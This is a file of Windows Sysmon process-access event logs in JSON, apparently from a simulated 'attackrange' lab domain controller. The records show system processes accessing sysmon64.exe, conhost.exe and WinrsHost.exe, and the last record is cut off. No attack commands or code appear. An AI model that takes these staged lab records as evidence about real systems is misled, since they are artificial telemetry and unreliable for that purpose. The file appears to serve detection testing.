{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.764\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.764","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.779\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.779","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-0010EC520600}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.795\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1776\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-0010EC520600}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 